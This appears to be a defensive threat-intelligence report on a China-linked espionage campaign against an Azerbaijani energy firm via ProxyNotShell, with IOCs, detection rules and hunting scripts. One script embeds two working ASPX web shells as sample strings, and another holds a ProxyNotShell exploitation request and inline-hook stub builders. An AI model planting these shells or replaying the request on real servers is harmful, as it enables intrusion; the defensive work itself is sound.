FamousSparrow Targets Azerbaijani Energy Infrastructure: A Three-Wave Chinese APT Espionage Campaign


Executive Summary

Between December 25, 2025 and late February 2026, the China-linked APT group FamousSparrow conducted three successive intrusion waves against an Azerbaijani oil and gas company — each time returning to the same initial entry point: an unpatched Microsoft Exchange server vulnerable to ProxyNotShell (CVE-2022-41040 / CVE-2022-41082).

This was not opportunistic compromise. The attackers returned after each remediation attempt the victim made, swapping their backdoor payload each time — Deed RAT (wave 1), Terndoor (wave 2), and a modified Deed RAT variant (wave 3) — while retaining persistent access through the same Exchange foothold. The operational discipline demonstrated here is characteristic of long-term, targeted espionage rather than hit-and-run intrusion.

Why Azerbaijan? Following the expiration of Russia's Ukraine gas transit agreement in late 2024 and Strait of Hormuz disruptions in early 2026, Azerbaijan became a strategic gas supplier to 13 European nations, including Germany and Austria. Intelligence collection against energy infrastructure with this level of geopolitical importance is consistent with Chinese state-sponsored espionage objectives.

Immediate action: Organizations running on-premises Microsoft Exchange should verify ProxyNotShell patch status immediately and hunt for web shells in IIS-accessible and Exchange web directories. Patching alone does not remove shells that were dropped before the patch; this campaign turned on exactly that gap.


Strategic Context: The South Caucasus as Contested Cyber-Espionage Territory

This campaign does not exist in isolation.

In February 2025, Bitdefender Labs documented UAC-0063 (also tracked as TAG-110, assessed with moderate confidence to be linked to Russian APT28/BlueDelta) running an active espionage campaign that started in Central Asia and expanded westward into European diplomatic and government targets. Their toolset centered on HATVIBE loader delivered via weaponized Microsoft Word documents — legitimate documents exfiltrated from Kazakh embassies and then re-weaponized with embedded VBA macro payloads. Post-compromise, the group deployed DownEx (C++) and CHERRYSPY (Python) backdoors for long-term data exfiltration.

The FamousSparrow campaign picks up that narrative one region further west — into the South Caucasus — with a different actor: UAC-0063 is Russia-linked; FamousSparrow is China-linked. Same strategic geography. Same category of high-value target. Two different nation-state actors operating simultaneously.

The picture is consistent: regions experiencing rapid increases in energy and geopolitical significance attract concurrent APT activity from multiple actors, including those that do not typically compete with each other directly.

Azerbaijan's position has materially shifted in the 2025–2026 timeframe. Gas export volumes have grown 56% cumulatively since 2021. The country now supplies energy to 13 European nations. From an espionage targeting perspective, this makes Azerbaijani energy companies a high-priority intelligence collection target for any state actor seeking insight into European energy supply chains.


Attack Timeline

Date                | Event
--------------------+------------------------------------------------------------------------------------------------
Dec 25, 2025        | w3wp.exe (Exchange IIS worker process) attempts to write a web shell into a web-accessible directory; ProxyNotShell exploitation confirmed
Dec 26–29, 2025     | Additional web shells deployed: key.aspx, log.aspx, errorFE_.aspx, signout_.aspx
Early January 2026  | Wave 1: Deed RAT deployed via the three-component LogMeIn Hamachi sideloading chain
Mid-January 2026    | Victim performs first remediation attempt
Late January 2026   | Wave 2: attackers return through the same Exchange entry point and attempt Terndoor deployment
Early February 2026 | Victim performs second remediation attempt
Late February 2026  | Wave 3: modified Deed RAT variant with updated magic values deployed

Technical Analysis

Initial Access: ProxyNotShell — A 2022 Vulnerability Still Delivering Results in 2026

ProxyNotShell chains two Microsoft Exchange Server vulnerabilities:

  • CVE-2022-41040: a server-side request forgery (SSRF) in the Autodiscover front end that lets an authenticated user reach internal Exchange back-end endpoints, including the Remote PowerShell endpoint
  • CVE-2022-41082: remote code execution through that PowerShell endpoint once it is reachable

Chained, the two give an attacker who holds credentials for any mailbox user arbitrary code execution on the Exchange server. Microsoft's advisory is explicit that authentication is required; in practice that bar is low, because a single phished or reused mailbox credential is enough. The forensic evidence in this case: w3wp.exe running under the MSExchangePowerShellAppPool application pool writing .aspx files into web-accessible directories.

The significance is not in the sophistication of the initial access. These CVEs have been public since September 2022 and patched since the November 2022 Exchange security update. The significance is that a well-resourced, state-sponsored actor chose to use them because they still worked: the organization had not fully remediated a three-year-old vulnerability on a production, internet-facing server.

Detection indicators:

Process: w3wp.exe
CommandLine contains: MSExchangePowerShellAppPool
Files created in: C:\inetpub\wwwroot\aspnet_client\ or Exchange virtual directories
Filenames: key.aspx, log.aspx, errorFE_.aspx, signout_.aspx
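The indicators above translate directly into an IIS log hunt. The following script is an added example written for this page, not code from the Bitdefender report or the FPT IS team: it parses W3C-format IIS logs (the format Exchange's front end writes by default) and flags the ProxyNotShell request shape Microsoft's original URL Rewrite mitigation matched, requests to the web shell names from this campaign, and server-side scripts requested from /aspnet_client/, which serves only static files in a stock install. The log lines are constructed for the example and are not from the incident.

```python
"""Hunt IIS W3C logs on an Exchange server for ProxyNotShell request shapes and web shell access."""
import re
from dataclasses import dataclass
from typing import Iterable, List

# Microsoft's original ProxyNotShell URL Rewrite mitigation matched REQUEST_URI against
# ".*autodiscover\.json.*\@.*Powershell.*"; the same shape is a good log hunt.
PROXYNOTSHELL_RE = re.compile(r".*autodiscover\.json.*@.*powershell.*", re.IGNORECASE)
# Web shell names from this campaign (IIS paths are case-insensitive, so compare lower-cased).
KNOWN_SHELLS = {"key.aspx", "log.aspx", "errorfe_.aspx", "signout_.aspx"}
# /aspnet_client/ holds static helper files in a stock install; a script request there is suspect.
NO_SCRIPT_DIRS = ("/aspnet_client/",)


@dataclass
class Finding:
    line_no: int
    reason: str
    client_ip: str
    uri: str
    status: str


def parse_iis(lines: Iterable[str]):
    """Yield (line_no, record) using the #Fields: header to name columns. IIS encodes spaces
    inside a field as '+', so a plain split on spaces is safe for well-formed lines."""
    fields = None
    for n, raw in enumerate(lines, 1):
        line = raw.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue  # truncated or garbled line: skip rather than mis-assign columns
        yield n, dict(zip(fields, parts))


def hunt(lines: Iterable[str]) -> List[Finding]:
    findings = []
    for n, rec in parse_iis(lines):
        stem = rec.get("cs-uri-stem", "")
        query = rec.get("cs-uri-query", "-")
        uri = stem if query == "-" else f"{stem}?{query}"
        base = stem.rsplit("/", 1)[-1].lower()
        reason = None
        if PROXYNOTSHELL_RE.match(uri):
            reason = "ProxyNotShell SSRF shape (autodiscover.json ... @ ... powershell)"
        elif base in KNOWN_SHELLS:
            reason = f"request to published web shell name {base}"
        elif base.endswith((".aspx", ".ashx", ".asmx")) and stem.lower().startswith(NO_SCRIPT_DIRS):
            reason = "server-side script requested from a static-only directory"
        if reason:
            findings.append(Finding(n, reason, rec.get("c-ip", "?"), uri, rec.get("sc-status", "?")))
    return findings


# Constructed sample log (not from the incident): one exploitation request, one shell hit,
# one unknown script under /aspnet_client/, and two benign OWA requests.
SAMPLE_LOG = [
    "#Software: Microsoft Internet Information Services 10.0",
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken",
    "2025-12-25 03:14:07 10.0.0.5 POST /owa/auth.owa - 443 - 203.0.113.7 Mozilla/5.0+(Windows+NT+10.0) - 302 0 0 120",
    "2025-12-25 03:14:09 10.0.0.5 POST /autodiscover/autodiscover.json @example.com/powershell?X-Rps-CAT=abc&Email=autodiscover/autodiscover.json%3f@example.com 443 corp\\jdoe 203.0.113.7 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 894",
    "2025-12-25 03:15:30 10.0.0.5 POST /aspnet_client/key.aspx - 443 - 203.0.113.7 python-requests/2.31 - 200 0 0 41",
    "2025-12-25 03:16:00 10.0.0.5 GET /aspnet_client/system_web/foo.aspx - 443 - 203.0.113.8 curl/8.0 - 404 0 2 3",
    "2025-12-25 03:16:10 10.0.0.5 GET /owa/ - 443 corp\\asmith 198.51.100.2 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 55",
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.reason} | {f.client_ip} {f.uri} -> {f.status}")
```

The authenticated username on the exploitation request (corp\jdoe in the sample) is the credential the attacker used; pivot on it immediately, because ProxyNotShell needs a valid mailbox login and that account is compromised whatever else the hunt finds.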

Wave 1: Deed RAT — An Evolved DLL Sideloading Mechanism

Deed RAT is a successor to ShadowPad, a backdoor platform shared across multiple Chinese espionage groups. The variant observed in this campaign introduces meaningful technical evolution.

Three-component deployment chain:

C:\TEMP\LMIGuardianSvc.exe       ← Legitimate LogMeIn Hamachi binary (MD5: 0554f3b69d39d175dd110d765c11347a)
C:\TEMP\lmiguardiandll.dll       ← Malicious loader
C:\TEMP\.hamachi.lng             ← Encrypted Deed RAT payload

After execution, the malware installs to:

C:\Program Files (x86)\LogMeIn Hamachi\
Service name: "LogMeIn Hamachi"
Startup: Automatic

The Two-Stage DLL Sideloading Technique:

Standard DLL sideloading places a malicious DLL next to a legitimate executable. When the executable runs, it loads the DLL and the payload fires immediately from DllMain or the first exported function the host calls. This pattern is well documented and most EDR platforms carry detections for its common forms.

FamousSparrow's implementation works differently. The malicious logic is split across two exported functions, and neither runs the payload at load time:

  1. Init export: does not execute the payload. It locates StartServiceCtrlDispatcherW in memory, changes the page protection, saves the original function bytes, and overwrites the function's entry point with a redirect. Init then returns cleanly and the host application continues its normal startup.
  2. ComMain export: later in its natural execution flow, LMIGuardianSvc.exe calls StartServiceCtrlDispatcherW to register with the service control manager. Because the entry point was patched during Init, that call is transparently redirected into the malicious loader. The loader first restores the saved bytes (removing the hook, so a later memory scan of the function sees it clean), then decrypts and runs the Deed RAT payload from .hamachi.lng.

Why this matters for defenders: automated sandboxes typically load a DLL in isolation or run the host binary outside its service context, so the sequence "Init installs the hook, the host later calls the patched API" is never completed and no malicious behaviour is observed. The infection is gated behind the legitimate application's own control flow.
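The hook described above is an inline patch of an exported API's first bytes, and the defensive check is to compare a function's prologue as mapped in memory against the on-disk image. The script below is an added example for this page, not code from the report or the malware: it classifies the common x64 redirect stubs (jmp rel32, mov rax/jmp rax, push/ret, and the RIP-relative indirect jmp) and recovers the redirect target where the bytes alone allow it. The clean prologue, the function address and the loader address are constructed for the example; they are not the real bytes or addresses of StartServiceCtrlDispatcherW or of the FamousSparrow loader.

```python
"""Classify an inline patch at a function entry point, the check a memory-forensics or hunting
script applies to exported APIs such as StartServiceCtrlDispatcherW."""
import struct
from dataclasses import dataclass
from typing import Optional

MASK64 = (1 << 64) - 1


@dataclass
class HookVerdict:
    kind: str               # clean | jmp_rel32 | mov_rax_jmp | push_ret | jmp_rip_indirect | patched_unknown
    target: Optional[int]   # redirect address recovered from the bytes, or the pointer slot for the indirect form


def classify_prologue(func_va: int, mem: bytes, disk: bytes, n: int = 16) -> HookVerdict:
    """Compare the first n bytes of a function as mapped in memory (mem) with the same bytes from the
    on-disk image after relocation (disk). func_va is the function's virtual address in the process."""
    if mem[:n] == disk[:n]:
        return HookVerdict("clean", None)
    # E9 rel32: jmp to func_va + 5 + rel32 (rel32 is signed)
    if mem[0] == 0xE9:
        rel = struct.unpack_from("<i", mem, 1)[0]
        return HookVerdict("jmp_rel32", (func_va + 5 + rel) & MASK64)
    # 48 B8 imm64 ; FF E0 : mov rax, imm64 ; jmp rax (12 bytes, reaches any 64-bit address)
    if mem[:2] == b"\x48\xB8" and mem[10:12] == b"\xFF\xE0":
        return HookVerdict("mov_rax_jmp", struct.unpack_from("<Q", mem, 2)[0])
    # 68 lo32 ; C7 44 24 04 hi32 ; C3 : push lo ; mov [rsp+4], hi ; ret (14 bytes)
    if mem[0] == 0x68 and mem[5:9] == b"\xC7\x44\x24\x04" and mem[13] == 0xC3:
        lo = struct.unpack_from("<I", mem, 1)[0]
        hi = struct.unpack_from("<I", mem, 9)[0]
        return HookVerdict("push_ret", (hi << 32) | lo)
    # FF 25 disp32: jmp qword ptr [rip + disp32]; the target pointer sits at func_va + 6 + disp32
    if mem[:2] == b"\xFF\x25":
        disp = struct.unpack_from("<i", mem, 2)[0]
        return HookVerdict("jmp_rip_indirect", (func_va + 6 + disp) & MASK64)
    return HookVerdict("patched_unknown", None)


# Builders for the three direct forms, so the classifier can be exercised round-trip.
def make_jmp_rel32(func_va: int, target: int) -> bytes:
    return b"\xE9" + struct.pack("<i", target - (func_va + 5))


def make_mov_rax_jmp(target: int) -> bytes:
    return b"\x48\xB8" + struct.pack("<Q", target) + b"\xFF\xE0"


def make_push_ret(target: int) -> bytes:
    return (b"\x68" + struct.pack("<I", target & 0xFFFFFFFF)
            + b"\xC7\x44\x24\x04" + struct.pack("<I", target >> 32) + b"\xC3")


def patch(disk: bytes, stub: bytes) -> bytes:
    """In-memory view after an inline patch: the stub overwrites the prologue, the rest is untouched."""
    return stub + disk[len(stub):]


# Constructed clean x64 prologue (mov [rsp+8],rbx ; push rdi ; sub rsp,20h ; mov rbx,rcx ; mov rdi,rdx).
# Not the real bytes of StartServiceCtrlDispatcherW; any 16-byte prologue behaves the same here.
CLEAN_PROLOGUE = bytes.fromhex("48895C2408574883EC20488BD9488BFA")
FUNC_VA = 0x7FFB2C0A1000      # hypothetical address of the API inside the service process
LOADER_VA = 0x7FFB2B001000    # hypothetical address of the malicious DLL's redirect stub

if __name__ == "__main__":
    for name, stub in (("jmp rel32", make_jmp_rel32(FUNC_VA, LOADER_VA)),
                       ("mov rax/jmp", make_mov_rax_jmp(LOADER_VA)),
                       ("push/ret", make_push_ret(LOADER_VA))):
        v = classify_prologue(FUNC_VA, patch(CLEAN_PROLOGUE, stub), CLEAN_PROLOGUE)
        print(f"{name:12s} -> {v.kind:16s} target={v.target:#x}")
    # Once the loader has restored the saved bytes, the function reads clean again.
    print(classify_prologue(FUNC_VA, CLEAN_PROLOGUE, CLEAN_PROLOGUE).kind)
```

The timing caveat follows from the page's description of the loader: the hook exists only between Init returning and the host's call to StartServiceCtrlDispatcherW, after which the original bytes are back. A periodic memory scan will usually miss that window; a hook check triggered on the page-protection change to a ntdll/advapi32 code page, or a snapshot taken at service start, is what actually catches it.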

Additional evolution markers in the Deed RAT samples from this campaign, relative to earlier documented Deed RAT: the payload magic value changed from 0xDEED4554 to 0xFF66ABCD, and the payload compression algorithm changed from Snappy to Deflate. Both break signatures and parsers keyed on the older constants.

[Figure: two-stage DLL sideloading flow in Deed RAT. Image: Bitdefender Labs]

Wave 2: Terndoor

After the first remediation attempt, the attackers returned through the same Exchange entry point and attempted to deploy Terndoor, a separate backdoor family in the FamousSparrow toolkit described as driver-backed. Re-entry was possible because the web shells had not been fully eradicated: a patched Exchange server still serves whatever .aspx files were left behind in its web directories.

Wave 3: Modified Deed RAT

The third wave brought a modified Deed RAT variant, with updated magic values and changed compression, consistent with an attempt to outrun signatures written after the Wave 1 discovery. Same Exchange entry point, same operational playbook, different payload.


IOC & Artifacts

# File Hashes
MD5: 0554f3b69d39d175dd110d765c11347a  → LMIGuardianSvc.exe (legitimate binary, abused for sideloading)
 
# File Paths (Staging)
C:\TEMP\LMIGuardianSvc.exe
C:\TEMP\lmiguardiandll.dll
C:\TEMP\.hamachi.lng
 
# File Paths (Installed)
C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
C:\Program Files (x86)\LogMeIn Hamachi\lmiguardiandll.dll
 
# Exchange Web Shells
key.aspx
log.aspx
errorFE_.aspx
signout_.aspx
 
# Windows Service
Service Name: "LogMeIn Hamachi"
Binary Path: C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
Start Type: Automatic
 
# Deed RAT Behavioral Signatures
Magic Value (new): 0xFF66ABCD  (vs 0xDEED4554 in prior samples)
Compression: Deflate  (vs Snappy in prior samples)

MITRE ATT&CK Mapping

Phase               | Technique ID | Technique Name                                           | Details
--------------------+--------------+----------------------------------------------------------+------------------------------------------------------------
Initial Access      | T1190        | Exploit Public-Facing Application                        | ProxyNotShell (CVE-2022-41040 / CVE-2022-41082) on Exchange
Persistence         | T1505.003    | Server Software Component: Web Shell                     | key.aspx, log.aspx, errorFE_.aspx, signout_.aspx in Exchange web directories
Persistence         | T1543.003    | Create or Modify System Process: Windows Service         | "LogMeIn Hamachi" service running the sideloading chain
Defense Evasion     | T1574.002    | Hijack Execution Flow: DLL Side-Loading                  | lmiguardiandll.dll loaded by the legitimate LMIGuardianSvc.exe (ATT&CK v16 folds this into T1574.001 DLL)
Defense Evasion     | T1574        | Hijack Execution Flow                                    | In-memory patch of StartServiceCtrlDispatcherW redirecting the host's own call into the loader; closest fit, since T1562 Impair Defenses does not apply (nothing defensive is disabled)
Defense Evasion     | T1027.013    | Obfuscated Files or Information: Encrypted/Encoded File  | .hamachi.lng carries the encrypted, compressed Deed RAT payload
Defense Evasion     | T1036.005    | Masquerading: Match Legitimate Name or Location          | LogMeIn Hamachi install path and service name
Command and Control | T1573        | Encrypted Channel                                        | Deed RAT C2 traffic is encrypted

Detection Rules

KQL (Microsoft Sentinel)

// Web shell drop: the Exchange PowerShell app pool worker writes a server-side script into a web path.
// This needs file telemetry (Defender for Endpoint); event 4688 cannot see it, because a file write
// creates no process.
DeviceFileEvents
| where ActionType in ("FileCreated", "FileModified")
| where InitiatingProcessFileName =~ "w3wp.exe"
| where InitiatingProcessCommandLine has "MSExchangePowerShellAppPool"
| where FileName matches regex @"(?i)\.(aspx|asp|ashx|asmx)$"
| where FolderPath has "inetpub" or FolderPath has "Exchange Server"
| project Timestamp, DeviceName, FileName, FolderPath, InitiatingProcessCommandLine, SHA1

// Web shell execution: w3wp.exe should never spawn a shell or script host
// (Security event 4688 with command-line auditing enabled)
SecurityEvent
| where EventID == 4688
| where ParentProcessName endswith "\\w3wp.exe"
| where NewProcessName endswith "\\cmd.exe" or NewProcessName endswith "\\powershell.exe"
    or NewProcessName endswith "\\pwsh.exe" or NewProcessName endswith "\\cscript.exe"
    or NewProcessName endswith "\\wscript.exe" or NewProcessName endswith "\\certutil.exe"
| project TimeGenerated, Computer, ParentProcessName, NewProcessName, CommandLine
 
// Sideloaded loader: LMIGuardianSvc.exe loading its companion DLL from a staging directory,
// or with a hash that does not match the DLL from a clean LogMeIn install
DeviceImageLoadEvents
| where InitiatingProcessFileName =~ "LMIGuardianSvc.exe"
| where FileName =~ "lmiguardiandll.dll"
| where FolderPath startswith "C:\\TEMP\\" or FolderPath startswith "C:\\Windows\\Temp\\"
    or SHA1 != "<known-good-hash>"   // fill in from a verified clean LogMeIn Hamachi install
| project Timestamp, DeviceName, FileName, FolderPath, SHA1, InitiatingProcessFolderPath
 
// New service whose binary lives in a temp directory, or that reuses the LogMeIn Hamachi service name.
// The installed copy sits under Program Files (x86), so the name clause matters; expect hits on
// legitimate Hamachi installs and verify installer provenance.
DeviceEvents
| where ActionType == "ServiceInstalled"
| extend ServiceName = tostring(parse_json(AdditionalFields).ServiceName)
| where FolderPath startswith "C:\\TEMP\\" or FolderPath startswith "C:\\Windows\\Temp\\"
    or ServiceName =~ "LogMeIn Hamachi"
| project Timestamp, DeviceName, ServiceName, FileName, FolderPath, InitiatingProcessFileName
 
// Hunt for the published web shell filenames in Exchange directories
DeviceFileEvents
| where ActionType in ("FileCreated", "FileModified")
| where FileName in~ ("key.aspx", "log.aspx", "errorFE_.aspx", "signout_.aspx")
| where FolderPath has "inetpub" or FolderPath has "Exchange"
| project Timestamp, DeviceName, FileName, FolderPath, InitiatingProcessFileName

Sigma Rule

title: Exchange Worker Process Writes Server-Side Script to Web Directory
id: fs-001-exchange-webshell
status: experimental
description: Detects a web shell being written by the Exchange IIS worker process (w3wp.exe), as seen in FamousSparrow ProxyNotShell exploitation. File-write events record the writing image but not its command line, so the application pool cannot be checked in this rule.
author: SOC Team
date: 2026/05/26
references:
  - https://businessinsights.bitdefender.com/famoussparrow-apt-targets-azerbaijani-oil-gas-industry
logsource:
  category: file_event
  product: windows
detection:
  selection:
    Image|endswith: '\w3wp.exe'
    TargetFilename|contains:
      - '\inetpub\wwwroot\'
      - '\FrontEnd\HttpProxy\'
      - '\ClientAccess\'
    TargetFilename|endswith:
      - '.aspx'
      - '.asp'
      - '.ashx'
      - '.asmx'
  condition: selection
falsepositives:
  - Rare; Exchange setup and cumulative updates write pages through ExSetup.exe, not w3wp.exe. Verify any hit with the Exchange administrator.
level: high
tags:
  - attack.initial_access
  - attack.t1190
  - attack.persistence
  - attack.t1505.003

Attribution: FamousSparrow and the Earth Estries Ecosystem

Bitdefender attributes this intrusion to FamousSparrow with moderate-to-high confidence. The assessment is based on the convergence of multiple evidence streams:

  • Exchange exploitation via ProxyNotShell (T1190) followed by web shell establishment (T1505.003)
  • DLL sideloading pattern with two-stage execution gating (T1574.002)
  • Deed RAT — a malware family with documented links to FamousSparrow operations
  • Mofu-based payload staging
  • Terndoor behavioral characteristics

FamousSparrow overlaps significantly with the Earth Estries and Salt Typhoon activity clusters; prior public reporting from Cisco Talos, Trend Micro, Microsoft, and ESET documents this overlap. Viewed as an ecosystem rather than a single actor, these clusters share tooling, infrastructure practices, and targeting patterns while maintaining distinct operational cells.

Previously documented FamousSparrow targets: telecoms, government entities, technology sectors across the US, Asia-Pacific, Middle East, and South Africa. This campaign represents the first public documentation of this activity cluster targeting energy infrastructure in the South Caucasus.


Expert Assessment

On the technical tradecraft:

The three-wave intrusion pattern carries a basic incident-response lesson: patching the vulnerability does not end the incident. Web shells established on an Exchange server are an independent persistence mechanism that survives the Exchange patch. The victim attempted remediation twice; the attacker returned twice; the web shells were the durable mechanism.

The two-stage DLL sideloading technique is a meaningful upgrade in evasion capability. It needs no kernel access, modifies no legitimate binary on disk, and requires no privileges beyond those the legitimate service already holds. Its anti-analysis property, gating payload execution behind the host's normal startup sequence, leaves genuine gaps in sandbox platforms that examine code out of context.

The magic value update from 0xDEED4554 to 0xFF66ABCD and the compression switch from Snappy to Deflate indicate active tool development while the campaign was running. This actor was watching whether its tools were detected and iterating accordingly.

On the broader pattern:

Viewed alongside the UAC-0063 research (February 2025), a clear pattern emerges: both Russia-aligned and China-aligned threat actors are actively intensifying espionage operations in regions experiencing rapid increases in strategic energy importance. This is not coincidence — it reflects deliberate intelligence collection priorities responding to geopolitical shifts.

For organizations in Southeast Asia, including Vietnam, the relevance is not as a direct targeting geography in this campaign. The relevance is that FamousSparrow belongs to an ecosystem (Earth Estries / Salt Typhoon) that has documented targeting of Southeast Asian telecommunications infrastructure. TTPs demonstrated in this Azerbaijani campaign are likely to appear in future operations across the region.


Recommendations

Immediate (0–24h)

  • Verify Exchange patch status for CVE-2022-41040 and CVE-2022-41082 across all on-premises Exchange servers. AdminDisplayVersion only reports the CU; the security update level is in the ExSetup.exe file version, so check that (or run Microsoft's HealthChecker.ps1) and compare against Microsoft's Exchange build number table:
    Get-ExchangeServer | ForEach-Object { Invoke-Command -ComputerName $_.Name { (Get-Command ExSetup.exe).FileVersionInfo.ProductVersion } }
    # Fix shipped in the November 2022 SU (Exchange 2019 CU11/CU12, 2016 CU22/CU23, 2013 CU23); the October 2022 URL Rewrite mitigation alone is not a patch
    
  • Hunt for web shells in Exchange and IIS-accessible directories. Creation timestamps can be stomped, so also key on LastWriteTime and review any server-side script that is not part of the stock Exchange file set:
    $roots = "C:\inetpub\wwwroot", (Join-Path $env:ExchangeInstallPath "FrontEnd\HttpProxy"), (Join-Path $env:ExchangeInstallPath "ClientAccess")
    $since = (Get-Date).AddDays(-90)
    Get-ChildItem -Path $roots -Recurse -Include *.aspx, *.ashx, *.asmx -ErrorAction SilentlyContinue |
      Where-Object { $_.CreationTime -gt $since -or $_.LastWriteTime -gt $since } |
      Select-Object FullName, CreationTime, LastWriteTime, Length
    
  • Scan for known IOCs — file names key.aspx, log.aspx, errorFE_.aspx, signout_.aspx and MD5 hash 0554f3b69d39d175dd110d765c11347a — across SIEM/EDR telemetry.
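File names are the weakest part of the hunt above, since the next wave will use different ones. The script below is an added example for this page (not code from the report or from FPT IS) that triages the content of server-side script files pulled from the directories listed in the previous step: it scores each page on constructs that do not appear in stock Exchange/OWA pages (eval over request input, process spawning, assembly loading, shell references) and flags anything over a threshold or carrying one of the published names. The indicator weights, the threshold, and the sample pages are constructed for the example.

```python
"""Content-based web shell triage for server-side script files collected from Exchange/IIS directories."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Names published for this campaign; a match is a hit regardless of content.
IOC_NAMES = {"key.aspx", "log.aspx", "errorfe_.aspx", "signout_.aspx"}

# Constructed heuristics, weighted by how unlikely the construct is in a legitimate Exchange/OWA page.
INDICATORS = [
    (re.compile(r"\beval\s*\(\s*Request", re.I), 5, "JScript eval over request input (China Chopper style)"),
    (re.compile(r"Request\.(Form|Item|Params|QueryString|Headers)\s*\[", re.I), 2, "reads an attacker-controlled request field"),
    (re.compile(r"System\.Diagnostics\.Process|ProcessStartInfo|Process\.Start", re.I), 4, "process spawning"),
    (re.compile(r"Assembly\.Load|Reflection\.Assembly", re.I), 4, "runtime assembly loading"),
    (re.compile(r"cmd\.exe|powershell", re.I), 3, "shell reference"),
    (re.compile(r"FromBase64String", re.I), 2, "base64 decode"),
    (re.compile(r"File\.WriteAll|FileStream", re.I), 2, "file write primitive"),
    (re.compile(r"unsafe", re.I), 1, 'JScript "unsafe" eval mode'),
]
THRESHOLD = 5  # constructed: two strong indicators, or one strong plus a request read


@dataclass
class Hit:
    name: str
    score: int
    reasons: List[str] = field(default_factory=list)


def score_page(content: str) -> Tuple[int, List[str]]:
    """Each indicator counts once per file, so a long legitimate page cannot accumulate score by repetition."""
    score, reasons = 0, []
    for rx, weight, why in INDICATORS:
        if rx.search(content):
            score += weight
            reasons.append(why)
    return score, reasons


def scan_pages(pages: Dict[str, str]) -> List[Hit]:
    """pages maps file name to file content. Returns hits ordered by descending score."""
    hits = []
    for name, content in pages.items():
        score, reasons = score_page(content)
        if name.lower() in IOC_NAMES:
            reasons.insert(0, "file name matches a published IOC")
        if name.lower() in IOC_NAMES or score >= THRESHOLD:
            hits.append(Hit(name, score, reasons))
    return sorted(hits, key=lambda h: -h.score)


# Constructed samples: a China Chopper style one-liner, a C# command shell, a published-name stub that
# scores below threshold on content alone, and a benign page.
SAMPLE_PAGES = {
    "key.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "log.aspx": ('<%@ Page Language="C#" %><% var p = new System.Diagnostics.Process(); '
                 'p.StartInfo.FileName = "cmd.exe"; p.StartInfo.Arguments = "/c " + Request.Form["c"]; '
                 'p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = true; '
                 'p.Start(); Response.Write(p.StandardOutput.ReadToEnd()); %>'),
    "errorFE_.aspx": '<%@ Page Language="C#" %><% Response.Write(Request.Headers["X-Cmd"]); %>',
    "default.aspx": ('<%@ Page Language="C#" MasterPageFile="~/Site.master" %>'
                     '<asp:Content ContentPlaceHolderID="Main" runat="server"><h1>Outlook Web App</h1></asp:Content>'),
}

if __name__ == "__main__":
    for h in scan_pages(SAMPLE_PAGES):
        print(f"{h.name}: score {h.score}; " + "; ".join(h.reasons))
```

In a real hunt, feed the function the output of the Get-ChildItem sweep (file path to content) and also diff the file list against a known-clean Exchange server of the same CU; a page that exists on the suspect server only is worth reading regardless of score.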

Short-term (1–7 days)

  • Deploy the detection rules (KQL/Sigma) provided above in your SIEM environment.
  • Audit recently created Windows Services — flag any service with a binary path under C:\TEMP\ or one mimicking known legitimate software names.
  • Collect file-creation telemetry from Exchange servers (Sysmon Event ID 11 or EDR file events) and alert on any server-side script written by w3wp.exe into a web-accessible directory; enable process command-line auditing so that child processes of w3wp.exe are visible in event 4688.
  • Hunt DLL sideloading patterns — identify cases where legitimate binaries are loading DLLs from non-standard paths.

Long-term

  • Eliminate Exchange on-premises exposure where business requirements permit. Migration to Exchange Online removes the entire ProxyNotShell / ProxyShell attack surface.
  • Network segmentation for Exchange servers — Exchange servers should not have unrestricted outbound internet connectivity.
  • Establish periodic threat hunting cycles — build hypotheses from regional APT TTPs and run structured hunts quarterly.
  • Validate EDR detection coverage for DLL sideloading and API hooking specifically — many platforms have non-trivial false negative rates against techniques that don't produce immediately visible process injection.

References

  1. Bitdefender Labs — FamousSparrow APT Targets Azerbaijani Oil and Gas Industry
  2. Security Affairs — FamousSparrow targets Azerbaijani energy sector in multi-wave espionage campaign
  3. Bitdefender Labs — UAC-0063: Cyber Espionage Operation Expanding from Central Asia
